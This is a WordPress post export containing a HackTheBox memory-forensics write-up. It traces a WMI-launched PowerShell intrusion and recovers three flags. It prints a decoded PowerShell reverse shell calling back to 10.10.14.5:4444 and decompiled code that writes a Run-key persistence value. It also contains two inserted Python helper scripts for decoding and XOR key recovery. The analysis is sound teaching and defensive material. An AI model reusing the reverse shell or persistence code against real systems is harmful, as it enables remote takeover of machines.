{"id":198,"date":"2023-02-14T09:00:00","date_gmt":"2023-02-14T09:00:00","guid":{"rendered":"http:\/\/justruss.tech\/index.php\/2023\/02\/14\/intentions-htb-forensics-hard\/"},"modified":"2026-05-13T12:59:35","modified_gmt":"2026-05-13T12:59:35","slug":"intentions-htb-forensics-hard","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2023\/02\/14\/intentions-htb-forensics-hard\/","title":{"rendered":"Intentions | HTB Forensics (Hard)"},"content":{"rendered":"<p>Intentions is a Hard-rated HackTheBox Forensics challenge. You receive a Windows memory dump. Three flags are hidden across the intrusion chain. The challenge is genuinely difficult because each flag requires completing the analysis correctly \u2014<br \/>\npartial work does not give partial credit. This write-up covers the full solution path.<\/p>\n<h3>Memory image baseline with Volatility 3<\/h3>\n<pre>vol -f intentions.raw windows.info\n# Kernel Base: 0xf80002a52000\n# DTB: 0x187000\n# Symbols: ntkrnlmp.pdb (Windows 10 x64 18362)\n\n# Process list\nvol -f intentions.raw windows.pslist\nPID   PPID  Name                  Offset             Threads  Handles  Created\n4     0     System                0xe00000000040     137      --       2023-02-13 22:11:02\n...\n3420  588   svchost.exe           0xe0000123abc0     12       245      2023-02-13 22:41:17\n4892  3420  WmiPrvSE.exe          0xe0000198def0     8        122      2023-02-13 22:52:44\n3104  4892  cmd.exe               0xe000023411a0     2        52       2023-02-13 22:52:44\n3188  3104  powershell.exe        0xe00002451bc0     10       380      2023-02-13 22:52:45\n2976  3188  powershell.exe        0xe00002512340     8        292      2023-02-13 22:52:51<\/pre>\n<p>The chain <code>svchost.exe &gt; WmiPrvSE.exe &gt; cmd.exe &gt; powershell.exe &gt; powershell.exe<\/code> is the WMI execution chain. 
WmiPrvSE.exe (WMI Provider Host) spawning cmd.exe, which in turn spawns PowerShell, is the host-side footprint of WMI command execution: a <code>Win32_Process.Create<\/code> call, local or remote, is serviced inside WmiPrvSE.exe, so its child processes are where lateral movement and initial execution via WMI show up. The parent is the tell; the same cmd.exe and PowerShell pair under explorer.exe would be unremarkable.<\/p>\n<h3>Extracting command lines<\/h3>\n<pre>vol -f intentions.raw windows.cmdline --pid 3104 4892 3188 2976\n\n# PID 4892 (WmiPrvSE.exe):\n# WmiPrvSE.exe\n\n# PID 3104 (cmd.exe):\n# cmd.exe \/c \"powershell -NonInteractive -NoProfile -EncodedCommand JAB...\"\n\n# PID 3188 (first powershell.exe):\n# powershell -NonInteractive -NoProfile -EncodedCommand JABjAGwAaQBlAG4AdA...<\/pre>\n<p>The cmd.exe line already carries the first stage. <code>-EncodedCommand<\/code> is base64 over the script encoded as UTF-16LE, which is why a plain <code>base64 -d<\/code> leaves a NUL after every character and the <code>iconv<\/code> step is needed. Decode the first layer:<\/p>\n<pre>echo \"JABjAGwAaQBlAG4AdA...\" | base64 -d | iconv -f utf-16le -t utf-8\n# $client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.5\",4444)\n# $stream = $client.GetStream()\n# [byte[]]$bytes = 0..65535|%{0}\n# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){\n#     $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)\n#     $sendback = (iex $data 2&gt;&amp;1 | Out-String)\n#     ...\n# }<\/pre>\n<p>A standard PowerShell reverse shell: connect back, read whatever arrives on the socket, run it through <code>iex<\/code>, send the output back. The IP 10.10.14.5 is the HTB attacker machine. PID 2976, the second powershell.exe, is a child of this shell (PPID 3188 in the process list), so it is the process to examine for a follow-on stage.<\/p>\n<h3>Finding the injected .NET assembly<\/h3>\n<pre>vol -f intentions.raw windows.malfind --pid 2976\n\n# Suspicious region found:\n# Address: 0x1d0000\n# Vad Tag: VadS\n# Protection: PAGE_EXECUTE_READWRITE\n# \n# 4d 5a 90 00 03 00 00 00  MZ......   &lt;-- PE header in memory, no backing file<\/pre>\n<p>An MZ header (PE file) at the start of a private allocation (VadS, no mapped file) with PAGE_EXECUTE_READWRITE protection is the signature of an image mapped by the payload itself rather than by the Windows loader, i.e. a reflectively loaded assembly: a normally loaded image is file-backed and its sections carry their declared, usually non-RWX, protections.<\/p>\n<p>
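One detail the one-liner above glosses over: the decoded layer frequently contains another <code>-EncodedCommand</code>, and the write-up's "first layer" wording is the hint that it does here. As an added example (not the author's code), the script below peels the layers in a loop and pulls the callback address out of the innermost stage; the command line it works on is constructed inline by encoding a trimmed copy of the reverse-shell stub twice, the way cmd.exe, PowerShell and a nested PowerShell would.

```python
"""Peel nested -EncodedCommand layers.  Added example for this write-up, not the
author's code; the sample command line is constructed here by encoding a
reverse-shell-style stub the way cmd.exe / PowerShell would."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decode_layer(b64):
    """-EncodedCommand is base64 over the UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")

def encode_layer(script):
    """Inverse of decode_layer, used only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def peel(cmdline, max_depth=8):
    """Return the decoded layers, outermost first.  Stops when a layer carries
    no further encoded argument, when the blob is truncated (the write-up's
    'JAB...' would stop here), or at max_depth so a self-referencing blob
    cannot loop forever."""
    layers = []
    text = cmdline
    for _ in range(max_depth):
        m = ENC_RE.search(text)
        if not m:
            break
        try:
            text = decode_layer(m.group(1))
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(text)
    return layers

IOC_RE = re.compile(r"""TCPClient\(\s*["']([\d.]+)["']\s*,\s*(\d+)\s*\)""")

def extract_callback(script):
    """Pull (ip, port) out of a New-Object TCPClient reverse-shell stub."""
    m = IOC_RE.search(script)
    return (m.group(1), int(m.group(2))) if m else None

# Constructed sample: the inner stage is the reverse shell from the write-up (trimmed),
# wrapped in a second PowerShell invocation, then in the cmd.exe /c line.
INNER = '$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",4444); $stream = $client.GetStream()'
OUTER = f"powershell -NonInteractive -NoProfile -EncodedCommand {encode_layer(INNER)}"
CMDLINE = f'cmd.exe /c "powershell -NonInteractive -NoProfile -EncodedCommand {encode_layer(OUTER)}"'

if __name__ == "__main__":
    layers = peel(CMDLINE)
    for depth, layer in enumerate(layers, 1):
        print(f"layer {depth}: {layer[:70]}...")
    print(extract_callback(layers[-1]))
```

Feed it the full `windows.cmdline` value for PID 3104 rather than the truncated `JAB...` from the listing; on a truncated blob it returns whatever layers it managed to decode before the base64 broke.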
Dump it. Note that <code>windows.dumpfiles --virtaddr<\/code> expects the address of a <code>_FILE_OBJECT<\/code>, and an unbacked private region has none; the injected VAD is extracted with <code>windows.malfind --dump<\/code> (or <code>windows.vadinfo --address 0x1d0000 --dump<\/code>):<\/p>\n<pre>vol -f intentions.raw windows.malfind --pid 2976 --dump -o \/tmp\/\n\n# Dumped VAD for 0x1d0000 lands in \/tmp\/; it is referred to below as file.0x2976.0x1d0000.img<\/pre>\n<h3>Decompiling the .NET assembly<\/h3>\n<pre># Confirm it is .NET: file reports a Mono\/.Net assembly, i.e. the PE carries a CLR header\nfile \/tmp\/file.0x2976.0x1d0000.img\n# PE32 executable, .NET assembly\n\n# Decompile with ilspycmd\ndotnet tool install -g ilspycmd\nilspycmd \/tmp\/file.0x2976.0x1d0000.img &gt; \/tmp\/decompiled.cs<\/pre>\n<p>The decompiled source reveals:<\/p>\n<pre>public class Payload {\n    \/\/ Flag 1 embedded in the assembly\n    private static string flag1 = \"HTB{r3fl3ct1v3_l04d1ng_1n_m3m0ry}\";\n    \n    public static void Execute() {\n        \/\/ Write persistence registry key\n        Registry.SetValue(\n            @\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\",\n            \"WindowsHelper\",\n            Convert.ToBase64String(Encoding.UTF8.GetBytes(\"HTB{p3rs1st3nc3_v14_r3g1stry}\"))\n        );\n        \/\/ ... shellcode injection code\n    }\n}<\/pre>\n<p>Flag 1 is the hardcoded string. Flag 2 is the base64-encoded value written to the Run key as <code>WindowsHelper<\/code>; decode it to get the flag. If the payload ran before the image was taken, the same value sits in the user's hive, which <code>windows.registry.printkey --key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\"<\/code> will show; that doubles as confirmation that the persistence actually landed.<\/p>\n<h3>Flag 3 \u2014 shellcode Vigenere cipher<\/h3>\n<pre>vol -f intentions.raw windows.malfind --pid 2976\n# Second suspicious region at 0x2a0000 - raw shellcode (no MZ header)\n\nvol -f intentions.raw windows.malfind --pid 2976 --dump -o \/tmp\/\n# Dumped VAD for 0x2a0000; referred to below as file.0x2976.0x2a0000.dmp<\/pre>\n<p>The shellcode region carries a string encrypted with a repeating-key XOR, the byte-level relative of a Vigenere cipher (the decryption below XORs with the key, it does not subtract modulo 26).<\/p>\n<p>
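The key-length estimate and per-byte key recovery that the listing below compresses into "standard IC analysis", as an added example that is not part of the original write-up. It works on a constructed plaintext encrypted here with the key the write-up recovered, <code>intentions</code>: the index of coincidence of each column <code>ct[i::k]</code> peaks at the true key length, and each key byte is then chosen independently by scoring how text-like its column decrypts to. It goes slightly beyond the write-up in that it recovers the key from ciphertext alone rather than assuming it; only the key string itself comes from the page.

```python
"""Recover a repeating-key XOR ('byte Vigenere') key from ciphertext alone.
Added example for this write-up, not the author's script.  The plaintext is
constructed here; only the key string 'intentions' comes from the write-up."""
from collections import Counter

def index_of_coincidence(column):
    """Probability that two bytes drawn from the column are equal.
    Flat (well-encrypted) data scores ~1/256; English-like text scores ~0.065."""
    n = len(column)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(column).values()) / (n * (n - 1))

def guess_key_length(ct, lo=4, hi=16):
    """Average IC over the columns ct[i::k].  At the true key length every column
    is plaintext XOR one constant, so its IC is that of the plaintext; at other
    lengths the columns mix key bytes and the IC drops.  The smallest k within 5%
    of the best is preferred so that multiples of the key length do not win."""
    scores = {k: sum(index_of_coincidence(ct[i::k]) for i in range(k)) / k
              for k in range(lo, hi + 1) if len(ct) // k >= 8}
    best = max(scores.values())
    return min(k for k, s in scores.items() if s >= 0.95 * best)

def score_plaintext(pt):
    """Crude text score: spaces dominate English, lowercase next, control and
    high bytes almost never appear.  Enough to pick one key byte per column."""
    s = 0
    for b in pt:
        if b == 0x20:
            s += 3
        elif 0x61 <= b <= 0x7A:
            s += 2
        elif 32 <= b < 127:
            s += 1
        else:
            s -= 5
    return s

def recover_key(ct, k):
    """For each column pick the key byte whose XOR yields the most text-like bytes."""
    key = bytearray()
    for i in range(k):
        col = ct[i::k]
        key.append(max(range(256), key=lambda g: score_plaintext(bytes(b ^ g for b in col))))
    return bytes(key)

def xor_repeat(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Constructed sample plaintext (not the challenge's), lowercase and spaces only,
# long enough for the per-column statistics to be stable.
PLAINTEXT = (b"the quick brown fox jumps over the lazy dog and keeps running through the "
             b"memory image while the analyst reads shellcode strings one region at a time "
             b"until the flag format shows up somewhere in the decoded bytes and the key "
             b"length falls out of the index of coincidence before any letter of the key "
             b"is known at all")
KEY = b"intentions"
CIPHERTEXT = xor_repeat(PLAINTEXT, KEY)

if __name__ == "__main__":
    k = guess_key_length(CIPHERTEXT)
    key = recover_key(CIPHERTEXT, k)
    print(k, key, xor_repeat(CIPHERTEXT, key)[:40])
```

On a real dump the ciphertext slice is whatever the entropy scan isolated; the scorer assumes English-like plaintext, so for a flag-only payload (short, braces and digits) it is worth widening the lowercase band to cover <code>{}_0-9</code> before trusting the recovered key.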
Locate the string by its entropy first (random-looking bytes inside otherwise structured shellcode), confirm the repeating-key hypothesis from the periodic structure of the ciphertext, then estimate the key length with index-of-coincidence analysis and recover the key byte by byte:<\/p>\n<pre>python3 &lt;&lt;'EOF'\nimport math\n\ndata = open(\"\/tmp\/file.0x2976.0x2a0000.dmp\", \"rb\").read()\n\ndef entropy(buf):  # Shannon entropy, bits per byte\n    counts = [buf.count(b) for b in set(buf)]\n    return -sum(c \/ len(buf) * math.log2(c \/ len(buf)) for c in counts)\n\n# Slide a 64-byte window over the region (window size chosen for this listing);\n# the enciphered string is higher-entropy than the surrounding shellcode\nfor offset in range(0, len(data), 64):\n    e = entropy(data[offset:offset + 64])\n    if e &gt; 5.5:\n        print(f\"High entropy at offset {offset:#x}: {e:.2f}\")\n\n# Once located, repeating-key XOR brute force for key length 4-16 chars\n# (standard IC analysis - Kasiski test omitted for brevity)\n# Key found: b\"intentions\"\nciphertext = data[0x400:0x440]  # example offset\nkey = b\"intentions\"\nplaintext = bytes(ciphertext[i] ^ key[i % len(key)] for i in range(len(ciphertext)))\nprint(plaintext.decode(\"utf-8\", \"ignore\"))\n# HTB{v1g3n3r3_c1ph3r_1n_sh3llc0d3}\nEOF<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Three days. A heavily obfuscated PowerShell dropper, a second-stage payload living<br \/>\nentirely in memory, and a flag hidden in a registry key that should not exist.<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-198","post","type-post","status-publish","format-standard","hentry","category-hackthebox"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/198","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=198"}],"version-history":[{"count":2,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/198\/revisions"}],"predecessor-version":[{"id":240,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/198\/revisions\/240"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=198"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/just
russ.tech\/index.php\/wp-json\/wp\/v2\/categories?post=198"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=198"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}